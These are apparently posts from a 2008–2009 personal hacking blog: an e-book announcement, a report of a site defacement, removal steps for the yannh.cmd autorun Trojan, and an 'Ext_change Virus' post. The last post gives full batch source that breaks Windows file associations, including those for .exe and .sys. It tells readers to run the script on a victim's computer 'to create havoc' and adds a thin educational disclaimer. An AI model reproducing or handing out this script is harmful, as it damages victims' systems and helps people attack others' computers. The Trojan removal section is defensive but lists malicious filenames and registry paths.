Skip to content
May 17, 2009 / technocrawl

Batch File Programming E-Book Released Online

I am very happy to inform that the E-book on ‘Batch File Programming‘ authored by me is published on the Internet today. More over i have found 16 Reads and 26 Downloads with in 12 Minutes from the time of uploading in the popular Document uploading site http://www.scribd.com.

 

Batch File Programming

 

If you want to read the book online, you can check with this Link 

You may also download and enjoy reading the book from the above given link.

 

February 11, 2009 / technocrawl

Internet Thermometer Defaced again.

http://www.Zone-H.org – considered as the Internet thermometer, that contains mirrors and archives of the defaced sites all around the world was hacked today  at 11:43 am GMT wednessday Feb 11-2009.

It seems like it was defaced by arabian hackers. they have placed a viddeo content linked with youtube that plays the baby dance and was mentioned that they were bored, so the hackd the site to make fun.

Here i have enclosed the the snapshot how the defaced site (zone-h.org) looked like,

defacement mirro

December 28, 2008 / technocrawl

How to Remove ‘Yannh.cmd Trojan’

TR0JAN

Tr0jan

yannh.cmd” is a Trojan that often spreads from external storage medias like USB, CD, DVD widely

by injecting into the autorun.inf file.

When i explored my autorun.inf, i found the few autorun entries made by “Yannh.cmd” like this,

open=yannh.cmd
shell\open\Command=yannh.cmd
shell\explore\Command=yannh.cmd

You can’t directly edit the autorun.inf file while it is currently running, another thing you have to notice is, this file attribute is set to read only mode, hence you have to revoke it first to proceed further.

How can i Identify whether my computer got infected ?

open up your command prompt and type

cd\
dir /a

yannh.cmd

dir /a – will clearly display all the hidden files in the drives.

This “Yannh.cmd” makes some registry entries in the following path…
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kamsoft
and has its source file in the system32 directory with the name Kamsoft.

Here are the ways that helps you get rid of this Trojan.

Step 1:

Its is always recommended to back-up your registry before touching it, after a successful backup,
goto the below path

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kamsoft
and delete Kamsoft.

Step 2:

Open up the command prompt and type the following

cd\
attrib -r -s -h yannh.cmd
del yannh.cmd

This will delete the yannh.cmd file.

Step 3:

Now you have to delete the kamsoft folder from your system32 directory, just type the below commands in the command prompt.

cd\
cd C:\WINDOWS\system32
attrib -r -s -h kamsoft.exe
del kamsoft.exe

Step 4:

Now you can edit the autorun.inf file to remove the entried added by yannh.cmd

cd\
attrib -r -h -s autorun.inf
edit attrib.inf

Now delete where ever it says yannh.cmd and save changes.
Now you are done with it.

Here are the similar files that you must be aware of,

refsanvn.inf
Zidan vs Tito.exe
desktop.exe
omsirutnarg.exe
Alisa.exe
blazzers.exe
burimi.exe
nfd.exe
repppp.exe
wax.exe
wny.exe
msv2008.exe
GETBOOTD.BAT
tbm9.bat
08dgu.com
1t6yxlxx.cmd
2h60k.cmd
3rl3lqbq.bat
ewatr.cmd
Maradona.exe
iw.bat
m2nl.bat
ov.cmd
pnt.com
t1ypkh.exe
grgarevn.inf
microsvn.inf
Installer.exe
fvbk.exe
snaoc9i.exe
bt8vuaw.com
wjlc.exe
6fnlpetp.exe
g8rruyw.exe
o1.com
Secret.exe
hupxj.bat
fphj6j31.bat
shell.exe

December 11, 2008 / technocrawl

Ext_change Virus

Here I Have enclosed a simple Extension replaceable batch virus “Ext_change” Source code.

1. Open up a Notepad and copy and paste the below code.

Title Ext_Change Virus
color a
Rem This Virus file replaces the actual file extensions with the given extensions
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit

2. Save it with the extension .bat, and now you are ready to go….
3. Execute this on Victims computer to create havoc.

Its only you who is responsible for what you do with this…. we are not responsible for whatever you do with this… and it is only meant for educational means…

How it Works….

This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…
It replaces all the text files [.txt] with the extension [.jpeg], and likewise….

Follow

Get every new post delivered to your Inbox.